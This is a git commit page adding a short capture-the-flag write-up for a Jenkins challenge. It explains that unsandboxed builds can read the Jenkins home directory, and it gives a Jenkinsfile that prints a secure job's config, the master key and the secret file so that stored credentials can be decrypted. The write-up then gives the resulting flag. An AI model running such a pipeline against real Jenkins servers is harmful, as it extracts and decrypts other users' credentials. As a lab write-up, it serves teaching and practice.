initial commit

author: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
committer: Aria <me@aria.rip> 2023-10-01 17:23:09 +0100
commit: b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch)
tree: 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/jenkins_03.md
1 files changed, 24 insertions, 0 deletions
diff --git a/punkctf/jenkins_03.md b/punkctf/jenkins_03.md
new file mode 100644
index 0000000..2ebfbe0
--- /dev/null
+++ b/punkctf/jenkins_03.md
@@ -0,0 +1,24 @@
+
+Jenkins doesn't provide any sort of sandboxing, but it tells you your build runs in `/var/jenkins_home/jobs/...`.
+You can modify the `Jenkinsfile` to enumerate `/var/jenkins_home`, using `find` or whatever else.
+
+From this we're able to read all the config files, including the one for secure jobs in `/var/jenkins_home/jobs/secure-jobs/config.xml`.
+The credentials in here are encrypted, but since we're able to read everything Jenkins can, we can find the key. I found [this](https://github.com/hoto/jenkins-credentials-decryptor) tool to do so.
+
+This `Jenkinsfile` gets everything we need for decryption.
+
+```
+pipeline {
+    agent any
+    stages {
+        stage('build') {
+            steps {
+                sh 'cat /var/jenkins_home/jobs/secure-jobs/config.xml'
+                sh 'cat /var/jenkins_home/secrets/master.key'
+                sh 'cat /var/jenkins_home/secrets/hudson.util.Secret | base64'
+            }
+        }
+    }
+}
+```
+Then we simply feed everything into the decryptor to get `punk_{GBI3BZOA3E8USYUH}`.
author	Aria <me@aria.rip>	2023-10-01 17:23:09 +0100
committer	Aria <me@aria.rip>	2023-10-01 17:23:09 +0100
commit	b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch)
tree	49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/jenkins_03.md